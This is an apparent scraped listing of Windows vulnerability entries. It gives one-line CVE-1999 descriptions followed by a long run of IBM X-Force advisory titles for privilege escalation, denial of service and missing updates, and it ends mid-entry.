[CVE-1999-0592] The Logon box of a Windows NT system displays the name of the last user who logged in. [CVE-1999-0591] An event log in Windows NT has inappropriate access permissions. [CVE-1999-0589] A system-critical Windows NT registry key has inappropriate permissions. [CVE-1999-0585] A Windows NT administrator account has the default name of Administrator. [CVE-1999-0584] A Windows NT file system is not NTFS. [CVE-1999-0583] There is a one-way or two-way trust relationship between Windows NT domains. [CVE-1999-0582] A Windows NT account policy has inappropriate, security-critical settings for lockout, e.g. lockout duration, lockout after bad logon attempts, etc. [CVE-1999-0581] The HKEY_CLASSES_ROOT key in a Windows NT system has inappropriate, system-critical permissions. [CVE-1999-0580] The HKEY_LOCAL_MACHINE key in a Windows NT system has inappropriate, system-critical permissions. [CVE-1999-0579] A Windows NT system's registry audit policy does not log an event success or failure for non-critical registry keys. [CVE-1999-0578] A Windows NT system's registry audit policy does not log an event success or failure for security-critical registry keys. [CVE-1999-0577] A Windows NT system's file audit policy does not log an event success or failure for non-critical files or directories. [CVE-1999-0576] A Windows NT system's file audit policy does not log an event success or failure for security-critical files or directories. [CVE-1999-0575] A Windows NT system's user audit policy does not log an event success or failure, e.g. for Logon and Logoff, File and Object Access, Use of User Rights, User and Group Management, Security Policy Changes, Restart, Shutdown, and System, and Process Tracking. [CVE-1999-0572] .reg files are associated with the Windows NT registry editor (regedit), making the registry susceptible to Trojan Horse attacks. [CVE-1999-0570] Windows NT is not using a password filter utility, e.g. PASSFILT.DLL. [CVE-1999-0562] The registry in Windows NT can be accessed remotely by users who are not administrators. [CVE-1999-0560] A system-critical Windows NT file or directory has inappropriate permissions. [CVE-1999-0549] Windows NT automatically logs in an administrator upon rebooting. [CVE-1999-0546] The Windows NT guest account is enabled. [CVE-1999-0535] A Windows NT account policy for passwords has inappropriate, security-critical settings, e.g. for password length, password age, or uniqueness. [CVE-1999-0534] A Windows NT user has inappropriate rights or privileges, e.g. Act as System, Add Workstation, Backup, Change System Time, Create Pagefile, Create Permanent Object, Create Token Name, Debug, Generate Security Audit, Increase Priority, Increase Quota, Load Driver, Lock Memory, Profile Single Process, Remote Shutdown, Replace Process Token, Restore, System Environment, Take Ownership, or Unsolicited Input. [CVE-1999-0506] A Windows NT domain user or administrator account has a default, null, blank, or missing password. [CVE-1999-0505] A Windows NT domain user or administrator account has a guessable password. [CVE-1999-0504] A Windows NT local user or administrator account has a default, null, blank, or missing password. [CVE-1999-0503] A Windows NT local user or administrator account has a guessable password. [CVE-1999-0496] A Windows NT 4.0 user can gain administrative rights by forcing NtOpenProcessToken to succeed regardless of the user's permissions, aka GetAdmin. [CVE-1999-0468] Internet Explorer 5.0 allows a remote server to read arbitrary files on the client's file system using the Microsoft Scriptlet Component. [CVE-1999-0444] Remote attackers can perform a denial of service in Windows machines using malicious ARP packets, forcing a message box display for each packet or filling up log files. [CVE-1999-0419] When the Microsoft SMTP service attempts to send a message to a server and receives a 4xx error code, it quickly and repeatedly attempts to redeliver the message, causing a denial of service. [CVE-1999-0404] Buffer overflow in the Mail-Max SMTP server for Windows systems allows remote command execution. [CVE-1999-0391] The cryptographic challenge of SMB authentication in Windows 95 and Windows 98 can be reused, allowing an attacker to replay the response and impersonate a user. [CVE-1999-0387] A legacy credential caching mechanism used in Windows 95 and Windows 98 systems allows attackers to read plaintext network passwords. [CVE-1999-0382] The screen saver in Windows NT does not verify that its security context has been changed properly, allowing attackers to run programs with elevated privileges. [CVE-1999-0379] Microsoft Taskpads allows remote web sites to execute commands on the visiting user's machine via certain methods that are marked as Safe for Scripting. [CVE-1999-0376] Local users in Windows NT can obtain administrator privileges by changing the KnownDLLs list to reference malicious programs. [CVE-1999-0369] The Sun sdtcm_convert calendar utility for OpenWindows has a buffer overflow which can gain root access. [CVE-1999-0366] In some cases, Service Pack 4 for Windows NT 4.0 can allow access to network shares using a blank password, through a problem with a null NT hash value. [CVE-1999-0364] Microsoft Access 97 stores a database password as plaintext in a foreign mdb, allowing access to data. [CVE-1999-0357] Windows 98 and other operating systems allows remote attackers to cause a denial of service via crafted "oshare" packets, possibly involving invalid fragmentation offsets. [CVE-1999-0345] Jolt ICMP attack causes a denial of service in Windows 95 and Windows NT systems. [CVE-1999-0285] Denial of service in telnet from the Windows NT Resource Kit, by opening then immediately closing a connection. [CVE-1999-0280] Remote command execution in Microsoft Internet Explorer using .lnk and .url files. [CVE-1999-0275] Denial of service in Windows NT DNS servers by flooding port 53 with too many characters. [CVE-1999-0274] Denial of service in Windows NT DNS servers through malicious packet which contains a response to a query that wasn't made. [CVE-1999-0249] Windows NT RSHSVC program allows remote users to execute arbitrary commands. [CVE-1999-0241] Guessable magic cookies in X Windows allows remote attackers to execute commands, e.g. through xterm. [CVE-1999-0229] Denial of service in Windows NT IIS server using ..\.. [CVE-1999-0228] Denial of service in RPCSS.EXE program (RPC Locator) in Windows NT. [CVE-1999-0227] Access violation in LSASS.EXE (LSA/LSARPC) program in Windows NT allows a denial of service. [CVE-1999-0226] Windows NT TCP/IP processes fragmented IP packets improperly, causing a denial of service. [CVE-1999-0225] Windows NT 4.0 allows remote attackers to cause a denial of service via a malformed SMB logon request in which the actual data size does not match the specified size. [CVE-1999-0224] Denial of service in Windows NT messenger service through a long username. [CVE-1999-0200] Windows NT FTP server (WFTP) with the guest account enabled without a password allows an attacker to log into the FTP server using any username and password. [CVE-1999-0179] Windows NT crashes or locks up when a Samba client executes a "cd .." command on a file share. [CVE-1999-0158] Cisco PIX firewall manager (PFM) on Windows NT allows attackers to connect to port 8080 on the PFM server and retrieve any file whose name and location is known. [CVE-1999-0153] Windows 95/NT out of band (OOB) data denial of service through NETBIOS port, aka WinNuke. [CVE-1999-0119] Windows NT 4.0 beta allows users to read and delete shares. SecurityFocus - https://www.securityfocus.com/bid/: [90065] Microsoft Windows Kernel 'Win32k.sys' CVE-2016-0174 Local Privilege Escalation Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [86256] Microsoft Windows Knowledge Base Article 2876063 update is not installed [86097] Microsoft Windows Knowledge Base Article 2859537 update is not installed [86096] Microsoft Windows NTVDM privilege escalation 3 [86095] Microsoft Windows NTVDM privilege escalation 2 [86094] Microsoft Windows NTVDM privilege escalation 1 [86091] Microsoft Windows Knowledge Base Article 2868623 update is not installed [86090] Microsoft Windows ICMPv6 denial of service [86089] Microsoft Windows Knowledge Base Article 2862772 update is not installed [86075] Microsoft Windows Knowledge Base Article 2850869 update is not installed [86074] Microsoft Windows Unicode code execution [86073] Microsoft Windows Knowledge Base Article 2873872 update is not installed [86072] Microsoft Windows Active Directory Federation Services information disclosure [86070] Microsoft Windows Knowledge Base Article 2849568 update is not installed [86069] Microsoft Windows Windows NAT Driver denial of service [85801] Microsoft Windows Movie Maker .wav denial of service [85245] Microsoft Windows Knowledge Base Article 2848295 update is not installed [85244] Microsoft Windows Knowledge Base Article 2847927 update is not installed [85243] Microsoft Windows Knowledge Base Article 2861561 update is not installed [85236] Microsoft Windows Knowledge Base Article 2850851 update is not installed [85234] Microsoft Windows privilege escalation [85233] Microsoft Windows denial of service [85232] Microsoft Windows privilege escalation [85231] Microsoft Windows TrueType font file code execution [85230] Microsoft Windows privilege escalation [85229] Microsoft Windows privilege escalation [85228] Microsoft Windows privilege escalation [85227] Microsoft Windows Knowledge Base Article 2847883 update is not installed [85226] Microsoft Windows Media Format Runtime code execution [85224] Microsoft Windows DefenderCVE-2013-3154 privilege escalation [85223] Microsoft Windows Knowledge Base Article 2846071 update is not installed [85205] Microsoft Windows Knowledge Base Article 2845187 update is not installed [84621] Microsoft Windows Knowledge Base Article 2845690 update is not installed [84620] Microsoft Windows kernel denial of service [84619] Microsoft Windows Knowledge Base Article 2839894 update is not installed [84618] Microsoft Windows Print Spooler privilege escalation [84617] Microsoft Windows Knowledge Base Article 2839571 update is not installed [84615] Microsoft Windows Knowledge Base Article 2839229 update is not installed [84614] Microsoft Windows kernel information disclosure [84613] Microsoft Windows Knowledge Base Article 2838727 update is not installed [84571] Microsoft Windows denial of service [84546] Microsoft Windows Media Player .wav denial of service [84391] Microsoft Windows win32k.sys privilege escalation [84267] Microsoft Windows Update file detected [84156] Microsoft Windows Knowledge Base Article 2847204 update is not installed [83912] Microsoft Windows Knowledge Base Article 2829254 update is not installed [83911] Microsoft Windows denial of service [83910] Microsoft Windows Knowledge Base Article 2829530 update is not installed [83898] Microsoft Windows Knowledge Base Article 2830397 update is not installed [83886] Microsoft Windows Knowledge Base Article 2830399 update is not installed [83884] Microsoft Windows Knowledge Base Article 2834692 update is not installed [83882] Microsoft Windows Knowledge Base Article 2834695 update is not installed [83880] Microsoft Windows Knowledge Base Article 2836440 update is not installed [83876] Microsoft Windows Knowledge Base Article 2840221 update is not installed [83875] Microsoft Windows privilege escalation [83874] Microsoft Windows privilege escalation [83873] Microsoft Windows privilege escalation [83192] Microsoft Windows Knowledge Base Article 2817183 update is not installed [83100] Microsoft Windows Knowledge Base Article 2830914 update is not installed [83099] Microsoft Windows denial of service [83098] Microsoft Windows Knowledge Base Article 2829996 update is not installed [83097] Microsoft Windows privilege escalation [83096] Microsoft Windows privilege escalation [83095] Microsoft Windows denial of service [83094] Microsoft Windows privilege escalation [83093] Microsoft Windows Knowledge Base Article 2828223 update is not installed [83091] Microsoft Windows Knowledge Base Article 2813170 update is not installed [83090] Microsoft Windows privilege escalation [83089] Microsoft Windows privilege escalation [83088] Microsoft Windows Knowledge Base Article 2827663 update is not installed [83086] Microsoft Windows Knowledge Base Article 2823482 update is not installed [83084] Microsoft Windows Knowledge Base Article 2821818 update is not installed [83082] Microsoft Windows Knowledge Base Article 2820917 update is not installed [83081] Microsoft Windows Client/Server Run-time Subsystem privilege escalation [83063] Microsoft Windows Modern Mail spoofing [82776] Microsoft Internet Explorer 10 on Windows 8 sandbox security bypass [82775] Microsoft Windows kernel privilege escalation [82774] Microsoft Windows ASLR and DEP security bypass [82772] Microsoft Windows ASLR security bypass [82769] Microsoft Windows TTF denial of service [82600] Microsoft Windows Knowledge Base Article 2813707 update is not installed [82599] Microsoft Windows Live Essentials information disclosure [82523] RSA Authentication Agent for Microsoft Windows Quick Pin security bypass [82424] Microsoft Windows Knowledge Base Article 2814124 update is not installed [82422] Microsoft Windows Knowledge Base Article 2780176 update is not installed [82417] Microsoft Windows Knowledge Base Article 2801261 update is not installed [82415] Microsoft Windows Knowledge Base Article 2807986 update is not installed [82414] Microsoft Windows USB device privilege escalation [82413] Microsoft Windows USB device privilege escalation [82412] Microsoft Windows USB device privilege escalation [82410] Microsoft Windows Knowledge Base Article 2809289 update is not installed [82401] Microsoft Windows Knowledge Base Article 2813682 update is not installed [82399] Microsoft Windows Knowledge Base Article 2816264 update is not installed [82089] Microsoft Windows ZwSetInformationProcess() denial of service [81859] Microsoft Windows Knowledge Base Article 2802968 update is not installed [81858] Microsoft Windows OLE code execution [81857] Microsoft Windows Knowledge Base Article 2809279 update is not installed [81683] Microsoft Windows Knowledge Base Article 2780091 update is not installed [81682] Microsoft Windows .MPG code execution [81681] Microsoft Windows Knowledge Base Article 2784242 update is not installed [81680] Microsoft Windows Knowledge Base Article 2790113 update is not installed [81679] Microsoft Windows Client/Server Run-time Subsystem memory privilege escalation [81678] Microsoft Windows Knowledge Base Article 2790655 update is not installed [81677] Microsoft Windows TCP/IP sequence denial of service [81676] Microsoft Windows Knowledge Base Article 2790978 update is not installed [81675] Microsoft Windows NFS server denial of service [81674] Microsoft Windows Knowledge Base Article 2797052 update is not installed [81673] Microsoft Windows Vector Markup Language code execution [81672] Microsoft Windows Knowledge Base Article 2799494 update is not installed [81671] Microsoft Windows kernel privilege escalation [81670] Microsoft Windows kernel privilege escalation [81669] Microsoft Windows kernel privilege escalation [81668] Microsoft Windows Knowledge Base Article 2800277 update is not installed [81666] Microsoft Windows Knowledge Base Article 2778344 update is not installed [81665] Microsoft Windows CVE-2013-1277 privilege escalation [81664] Microsoft Windows CVE-2013-1276 privilege escalation [81663] Microsoft Windows CVE-2013-1275 privilege escalation [81662] Microsoft Windows CVE-2013-1274 privilege escalation [81661] Microsoft Windows CVE-2013-1273 privilege escalation [81660] Microsoft Windows CVE-2013-1272 privilege escalation [81659] Microsoft Windows CVE-2013-1271 privilege escalation [81658] Microsoft Windows CVE-2013-1270 privilege escalation [81657] Microsoft Windows CVE-2013-1269 privilege escalation [81656] Microsoft Windows CVE-2013-1268 privilege escalation [81655] Microsoft Windows CVE-2013-1267 privilege escalation [81654] Microsoft Windows CVE-2013-1266 privilege escalation [81653] Microsoft Windows CVE-2013-1265 privilege escalation [81652] Microsoft Windows CVE-2013-1264 privilege escalation [81651] Microsoft Windows CVE-2013-1263 privilege escalation [81650] Microsoft Windows CVE-2013-1262 privilege escalation [81649] Microsoft Windows CVE-2013-1261 privilege escalation [81648] Microsoft Windows CVE-2013-1260 privilege escalation [81647] Microsoft Windows CVE-2013-1259 privilege escalation [81646] Microsoft Windows CVE-2013-1258 privilege escalation [81645] Microsoft Windows CVE-2013-1257 privilege escalation [81644] Microsoft Windows CVE-2013-1256 privilege escalation [81643] Microsoft Windows CVE-2013-1255 privilege escalation [81642] Microsoft Windows CVE-2013-1254 privilege escalation [81641] Microsoft Windows CVE-2013-1253 privilege escalation [81640] Microsoft Windows CVE-2013-1252 privilege escalation [81639] Microsoft Windows CVE-2013-1251 privilege escalation [81638] Microsoft Windows CVE-2013-1250 privilege escalation [81637] Microsoft Windows CVE-2013-1249 privilege escalation [81636] Microsoft Windows CVE-2013-1248 privilege escalation [81634] Microsoft Windows Knowledge Base Article 2792100 update is not installed [81339] Microsoft Windows Knowledge Base Article 2799329 update is not installed [80918] Microsoft Windows digital certificate spoofing [80875] Microsoft Windows Knowledge Base Article 2756145 update is not installed [80874] Microsoft Windows XML code execution [80873] Microsoft Windows XML content code execution [80872] Microsoft Windows Knowledge Base Article 2769324 update is not installed [80869] Microsoft .NET Framework Windows Forms privilege escalation [80867] Microsoft Windows Knowledge Base Article 2769327 update is not installed [80865] Microsoft Windows Knowledge Base Article 2769369 update is not installed [80864] Microsoft Windows print spooler code execution [80863] Microsoft Windows Knowledge Base Article 2778930 update is not installed [80862] Microsoft Windows broadcast privilege escalation [80861] Microsoft Windows Knowledge Base Article 2785220 update is not installed [80860] Microsoft Windows SSL/TLS security bypass [80365] Microsoft Windows Knowledge Base Article 2761465 update is not installed [80360] Microsoft Windows Knowledge Base Article 2765809 update is not installed [80359] Microsoft Windows IPHTTPS security bypass [80358] Microsoft Windows Knowledge Base Article 2770660 update is not installed [80357] Microsoft Windows DirectPlay buffer overflow [80356] Microsoft Windows Knowledge Base Article 2780642 update is not installed [80352] Microsoft Windows Knowledge Base Article 2783534 update is not installed [80351] Microsoft Windows TrueType Fonts files code execution [80350] Microsoft Windows OpenType Font code execution [80349] Microsoft Windows Knowledge Base Article 2784126 update is not installed [79693] Microsoft Windows Knowledge Base Article 2745030 update is not installed [79687] Microsoft Windows Knowledge Base Article 2761451 update is not installed [79683] Microsoft Windows Knowledge Base Article 2761226 update is not installed [79682] Microsoft Windows font code execution [79681] Microsoft Windows kernel privilege escalation [79680] Microsoft Windows kernel privilege escalation [79679] Microsoft Windows Knowledge Base Article 2758857 update is not installed [79678] Microsoft Windows filenames code execution [79677] Microsoft Windows Knowledge Base Article 2727528 update is not installed [79676] Microsoft Windows Briefcase integer overflow [79675] Microsoft Windows Briefcase integer underflow [79648] Microsoft Windows Help Viewer denial of service [79479] Microsoft Windows Media Player .avi denial of service [79124] Microsoft Windows IKE privilege escalation [78864] Microsoft Windows Knowledge Base Article 2754670 update is not installed [78862] Microsoft Windows Knowledge Base Article 2743555 update is not installed [78861] Microsoft Windows Kerberos denial of service [78858] Microsoft Windows Knowledge Base Article 2754849 update is not installed [78856] Microsoft Windows Knowledge Base Article 2724197 update is not installed [78855] Microsoft Windows kernel privilege escalation [78853] Microsoft Windows Knowledge Base Article 2741517 update is not installed [78851] Microsoft Windows Knowledge Base Article 2742319 update is not installed [78848] Microsoft Windows Knowledge Base Article 2742321 update is not installed [78760] Microsoft Windows Knowledge Base Article 2744842 update is not installed [78620] Microsoft Windows Phone 7 domain name spoofing [78077] Microsoft Windows Knowledge Base Article 2741528 update is not installed [78075] Microsoft Windows Knowledge Base Article 2720184 update is not installed [78071] Microsoft Windows Knowledge Base Article 2748552 update is not installed [77512] Microsoft Windows Knowledge Base Article 2740358 update is not installed [77362] Microsoft Windows Knowledge Base Article 2733918 update is not installed [77360] Microsoft Windows Knowledge Base Article 2733829 update is not installed [77357] Microsoft Windows Knowledge Base Article 2733594 update is not installed [77356] Microsoft Windows RAP response packet buffer overflow [77355] Microsoft Windows RAP response packet buffer overflow [77354] Microsoft Windows Print Spooler service format string [77353] Microsoft Windows Remote Administration Protocol denial of service [77352] Microsoft Windows Knowledge Base Article 2731879 update is not installed [77350] Microsoft Windows Knowledge Base Article 2731847 update is not installed [77349] Microsoft Windows memory privilege escalation [77348] Microsoft Windows Knowledge Base Article 2723135 update is not installed [77347] Microsoft Windows Remote Desktop Protocol code execution [77346] Microsoft Windows Knowledge Base Article 2722913 update is not installed [77342] Microsoft Windows Knowledge Base Article 2720573 update is not installed [77341] Microsoft Windows ActiveX control code execution [77325] Microsoft Windows Knowledge Base Article 2719584 update is not installed [77323] Microsoft Windows Knowledge Base Article 2706045 update is not installed [77322] Microsoft Windows VBScript and JScript and Microsoft Internet Explorer object integer overflow [77244] nginx and Microsoft Windows request security bypass [76808] Microsoft Windows Knowledge Base Article 2721015 update is not installed [76725] Microsoft Windows Knowledge Base Article 2722479 update is not installed [76724] Microsoft Windows Knowledge Base Article 2719177 update is not installed [76721] Microsoft Windows Knowledge Base Article 2718523 update is not installed [76720] Microsoft Windows hook procedure privilege escalation [76719] Microsoft Windows keyboard privilege escalation [76718] Microsoft Windows Knowledge Base Article 2698365 update is not installed [76711] Microsoft Windows Knowledge Base Article 2695502 update is not installed [76707] Microsoft Windows search scopes information disclosure [76704] Microsoft Windows Knowledge Base Article 2691442 update is not installed [76703] Microsoft Windows file code execution [76702] Microsoft Windows Knowledge Base Article 2655992 update is not installed [76701] Microsoft Windows TLS information disclosure [76223] Microsoft Windows .otf denial of service [76221] Microsoft Windows XML Core Services code execution [76026] Microsoft Windows Microsoft Certificate Authority spoofing [75963] Microsoft Windows Knowledge Base Article 2699988 update is not installed [75949] Microsoft Windows Knowledge Base Article 2707960 update is not installed [75942] Microsoft Windows Knowledge Base Article 2706726 update is not installed [75939] Microsoft Windows Knowledge Base Article 2685939 update is not installed [75938] Microsoft Windows RDP code execution [75934] Microsoft Windows Knowledge Base Article 2709162 update is not installed [75933] Microsoft Windows thread privilege escalation [75932] Microsoft Windows font privilege escalation [75931] "Microsoft Windows Clipboard Format Atom Name privilege escalation" [75930] Microsoft Windows String Atom Class Name privilege escalation [75929] Microsoft Windows String Atom Class Name privilege escalation [75928] Microsoft Windows Knowledge Base Article 2711167 update is not installed [75927] Microsoft Windows User Mode Scheduler privilege escalation [75926] Microsoft Windows Knowledge Base Article 2709100 update is not installed [75905] Microsoft Windows Knowledge Base Article 2707956 update is not installed [75772] Microsoft Windows keyboard layout privilege escalation [75329] Microsoft Windows xxxCreateWindowEx() denial of service [75140] Microsoft Windows scrollbar calculation privilege escalation [75139] Microsoft Windows Keyboard Layout files privilege escalation [75138] Microsoft Windows messages privilege escalation [75136] Microsoft Windows Knowledge Base Article 2693777 update is not installed [75132] Microsoft Windows Knowledge Base Article 2690533 update is not installed [75131] Microsoft Windows Plug and Play (PnP) privilege escalation [75130] Microsoft Windows Knowledge Base Article 2688338 update is not installed [75129] Microsoft Windows IPv6 address privilege escalation [75128] Microsoft Windows broadcast packets security bypass [75127] Microsoft Windows Knowledge Base Article 2681578 update is not installed [75126] Microsoft Windows GDI+ EMF buffer overflow [75125] Microsoft Windows GDI+ EMF code execution [75124] Microsoft Windows TrueType code execution [75123] Microsoft Windows Knowledge Base Article 2680352 update is not installed [75116] Microsoft Windows Knowledge Base Article 2597981 update is not installed [74556] Microsoft Windows Knowledge Base Article 2639185 update is not installed [74384] Microsoft Windows Knowledge Base Article 2675157 update is not installed [74378] Microsoft Windows Knowledge Base Article 2671605 update is not installed [74373] Microsoft Windows Knowledge Base Article 2664258 update is not installed [74372] Microsoft Windows MSCOMCTL.OCX ActiveX control code execution [74369] Microsoft Windows Knowledge Base Article 2663860 update is not installed [73543] Microsoft Windows Knowledge Base Article 2671387 update is not installed [73542] Microsoft Windows Remote Desktop Protocol denial of service [73541] Microsoft Windows Remote Desktop Protocol code execution [73540] Microsoft Windows Knowledge Base Article 2665364 update is not installed [73538] Microsoft Windows Knowledge Base Article 2651019 update is not installed [73536] Microsoft Windows Knowledge Base Article 2651018 update is not installed [73533] Microsoft Windows Knowledge Base Article 2647170 update is not installed [73532] Microsoft Windows DNS Server denial of service [73530] Microsoft Windows Knowledge Base Article 2641653 update is not installed [73529] Microsoft Windows PostMessage function privilege escalation [73356] Microsoft Windows DNS security bypass [72950] Microsoft Windows IPv6 information disclosure [72887] Microsoft Windows Knowledge Base Article 2663841 update is not installed [72873] Microsoft Windows Knowledge Base Article 2663830 update is not installed [72867] Microsoft Windows Knowledge Base Article 2663510 update is not installed [72857] Microsoft Windows Knowledge Base Article 2661637 update is not installed [72855] Microsoft Windows Knowledge Base Article 2660465 update is not installed [72854] Microsoft Windows keyboard privilege escalation [72853] Microsoft Windows Knowledge Base Article 2653956 update is not installed [72852] Microsoft Windows Authenticode code execution [72851] Microsoft Windows Knowledge Base Article 2654428 update is not installed [72850] Microsoft Windows msvcrt dynamic link library buffer overflow [72849] Microsoft Windows Knowledge Base Article 2651026 update is not installed [72846] Microsoft Windows Knowledge Base Article 2647516 update is not installed [72841] Microsoft Windows Knowledge Base Article 2645640 update is not installed [72840] Microsoft Windows Ancillary Function Driver privilege escalation [72839] Microsoft Windows Ancillary Function Driver privilege escalation [72838] Microsoft Windows Knowledge Base Article 2643719 update is not installed [72560] Microsoft Windows Media Format ASF invalid stream [72346] Microsoft Windows Explorer denial of service [72029] Microsoft Windows Knowledge Base Article 2638420 update is not installed [72003] Microsoft Windows Knowledge Base Article 2646524 update is not installed [72002] Microsoft Windows Client/Server Run-time Subsystem Unicode privilege escalation [71998] Microsoft Windows Knowledge Base Article 2644615 update is not installed [71997] Microsoft Windows SafeSEH security bypass [71995] Microsoft Windows Knowledge Base Article 2643584 update is not installed [71994] Microsoft Windows Knowledge Base Article 2636391 update is not installed [71993] Microsoft Windows DirectShow code execution [71992] Microsoft Windows Media Player MIDI code execution [71991] Microsoft Windows Knowledge Base Article 2607664 update is not installed [71966] Microsoft Windows Media Player access denial of service [71944] Microsoft Windows Phone messages denial of service [71873] Microsoft Windows win32k.sys code execution [71733] Microsoft Windows sandbox privilege escalation [71565] Microsoft Windows Knowledge Base Article 2648048 update is not installed [71564] Microsoft Windows Media Player DVR-MS code execution [71562] Microsoft Windows Knowledge Base Article 2640241 update is not installed [71560] Microsoft Windows Knowledge Base Article 2640045 update is not installed [71559] Microsoft Windows Active Directory buffer overflow [71558] Microsoft Windows Knowledge Base Article 2639417 update is not installed [71557] Microsoft Windows Knowledge Base Article 2639142 update is not installed [71554] Microsoft Windows Knowledge Base Article 2633171 update is not installed [71553] Microsoft Windows kernel privilege escalation [71552] Microsoft Windows Knowledge Base Article 2624667 update is not installed [71551] Microsoft Windows OLE object code execution [71550] Microsoft Windows Knowledge Base Article 2620712 update is not installed [71549] Microsoft Windows Client/Server Run-time Subsystem Csrsrv.dll privilege escalation [71548] Microsoft Windows Knowledge Base Article 2618451 update is not installed [71546] Microsoft Windows Knowledge Base Article 2618444 update is not installed [71542] Microsoft Windows Knowledge Base Article 2607702 update is not installed [71538] Microsoft Windows Knowledge Base Article 2590602 update is not installed [71418] Microsoft Windows keyboard layout denial of service [71291] Microsoft Windows Server AppLocker security bypass [71073] Microsoft Windows kernel Duqu code execution [70951] Microsoft Windows Knowledge Base Article 2630837 update is not installed [70950] Microsoft Windows Active Directory privilege escalation [70949] Microsoft Windows Knowledge Base Article 2620704 update is not installed [70948] Microsoft Windows Mail and Windows Meeting Space code execution [70947] Microsoft Windows Knowledge Base Article 2617657 update is not installed [70946] Microsoft Windows TrueType denial of service [70945] Microsoft Windows Knowledge Base Article 2603381 update is not installed [70944] Microsoft Windows Object Packager code execution [70943] Microsoft Windows Knowledge Base Article 2588516 update is not installed [70942] Microsoft Windows TCP/IP code execution [70940] Microsoft Windows ClickOnce code execution [70152] Microsoft Windows Knowledge Base Article 2623699 update is not installed [70150] Microsoft Windows Knowledge Base Article 2607670 update is not installed [70143] Microsoft Windows Media Center DLL code execution [70140] Microsoft Windows Knowledge Base Article 2652016 update is not installed [70137] Microsoft Windows Ancillary Function Driver privilege escalation [70130] Microsoft Windows Knowledge Base Article 2586448 update is not installed [70115] Microsoft Windows Knowledge Base Article 2567053 update is not installed [70114] Microsoft Windows use-after-free privilege escalation [70113] Microsoft Windows .fon buffer overflow [70112] Microsoft Windows TrueType denial of service [69638] Microsoft Windows csrss.exe denial of service [69558] Microsoft Windows Script Host DLL code execution [69501] Microsoft Windows Knowledge Base Article 2587634 update is not installed [69498] Microsoft Windows Knowledge Base Article 2587505 update is not installed [69492] Microsoft Windows Knowledge Base Article 2571621 update is not installed [69491] Microsoft Windows WINS privilege escalation [69490] Microsoft Windows Knowledge Base Article 2570947 update is not installed [69489] Microsoft Windows components DLL code execution [69215] Microsoft Windows DHCPv6 denial of service [69009] Microsoft Windows Client/Server Run-time Subsystem information disclosure [68840] Microsoft Windows Knowledge Base Article 2451858 update is not installed [68838] Microsoft SharePoint and Windows SharePoint Services cross-site scripting [68837] Microsoft SharePoint and Windows SharePoint Services XML file disclosure [68836] Microsoft SharePoint and Windows SharePoint Services contact details cross-site scripting [68833] Microsoft Windows Knowledge Base Article 2567943 update is not installed [68831] Microsoft Windows Knowledge Base Article 2570222 update is not installed [68830] Microsoft Windows Remote Desktop Protocol denial of service [68829] Microsoft Windows Knowledge Base Article 2567951 update is not installed [68827] Microsoft Windows Knowledge Base Article 2578230 update is not installed [68825] Microsoft Windows Knowledge Base Article 2546250 update is not installed [68824] Microsoft Windows Remote Desktop Web Access privilege escalation [68823] Microsoft Windows Knowledge Base Article 2559049 update is not installed [68816] Microsoft Windows Knowledge Base Article 2556532 update is not installed [68815] Microsoft Windows kernel meta-data denial of service [68814] Microsoft Windows Knowledge Base Article 2560656 update is not installed [68813] Microsoft Windows Data Access code execution [68812] Microsoft Windows Knowledge Base Article 2560978 update is not installed [68809] Microsoft Windows Knowledge Base Article 2562485 update is not installed [68808] Microsoft Windows DNS Server denial of service [68807] Microsoft Windows DNS Server code execution [68806] Microsoft Windows Knowledge Base Article 2566454 update is not installed [68805] Microsoft Windows NDISTAPI privilege escalation [68804] Microsoft Windows Knowledge Base Article 2563894 update is not installed [68803] Microsoft Windows TCP/IP QoS denial of service [68802] Microsoft Windows TCP/IP ICMP denial of service [68801] Microsoft Windows Knowledge Base Article 2567680 update is not installed [68800] Microsoft Windows Client/Server Run-time Subsystem Winsrv.dl privilege escalation [68469] Microsoft Windows GPU denial of service [68467] Microsoft Windows NVIDIA Geforce 310 denial of service [68465] Microsoft Windows Intel G41 denial of service [68315] Microsoft Windows Knowledge Base Article 2555917 update is not installed [68314] Microsoft Windows win32k.sys privilege escalation [68313] Microsoft Windows win32k.sys privilege escalation [68312] Microsoft Windows win32k.sys information disclosure [68311] Microsoft Windows NULL privilege escalation [68310] Microsoft Windows win32k.sys privilege escalation [68309] Microsoft Windows win32k.sys privilege escalation [68308] Microsoft Windows win32k.sys privilege escalation [68307] Microsoft Windows NULL pointer privilege escalation [68306] Microsoft Windows NULL pointer privilege escalation [68305] Microsoft Windows kernel-mode driver privilege escalation [68304] Microsoft Windows kernel-mode driver privilege escalation [68303] Microsoft Windows kernel-mode driver privilege escalation [68302] Microsoft Windows win32k.sys privilege escalation [68301] Microsoft Windows win32k.sys privilege escalation [68300] Microsoft Windows win32k.sys privilege escalation [68299] Microsoft Windows Knowledge Base Article 2566220 update is not installed [68298] Microsoft Windows Bluetooth stack code execution [68283] Microsoft Windows Knowledge Base Article 2560847 update is not installed [68002] Microsoft Windows Media Player klite denial of service [67989] Microsoft Windows tskill privilege escalation [67955] Microsoft Windows Knowledge Base Article 2530548 update is not installed [67943] Microsoft Windows Knowledge Base Article 2544521 update is not installed [67942] Microsoft Windows Vector Markup Language (VML) code execution [67795] Microsoft Windows Live Messenger dwmapi.dll code execution [67762] Microsoft Windows Knowledge Base Article 2543893 update is not installed [67759] Microsoft Windows Knowledge Base Article 2544893 update is not installed [67758] Microsoft Windows MHTML information disclosure [67757] Microsoft Windows Knowledge Base Article 2476490 update is not installed [67756] Microsoft Windows Object Linking and Embedding WMF code execution [67755] Microsoft Windows Knowledge Base Article 2503665 update is not installed [67754] Microsoft Windows Ancillary Function Driver privilege escalation [67753] Microsoft Windows Knowledge Base Article 2514842 update is not installed [67751] Microsoft Windows Knowledge Base Article 2518295 update is not installed [67750] Microsoft Windows Active Directory Certificate Services Web Enrollment cross-site scripting [67749] Microsoft Windows Knowledge Base Article 2507938 update is not installed [67748] Microsoft Windows SrvWriteConsoleOutputString privilege escalation [67747] Microsoft Windows SrvWriteConsoleOutput privilege escalation [67746] Microsoft Windows CSRSS SrvSetConsoleNumberOfCommand privilege escalation [67745] Microsoft Windows CSRSS SrvSetConsoleLocalEUDC privilege escalation [67744] Microsoft Windows CSRSS AllocConsole privilege escalation [67737] Microsoft Windows Knowledge Base Article 2520426 update is not installed [67733] Microsoft Windows Knowledge Base Article 2525694 update is not installed [67732] Microsoft Windows Win32k OTF code execution [67731] Microsoft Windows Knowledge Base Article 2525835 update is not installed [67730] Microsoft Windows Server Hyper-V VMBus denial of service [67728] Microsoft Windows Knowledge Base 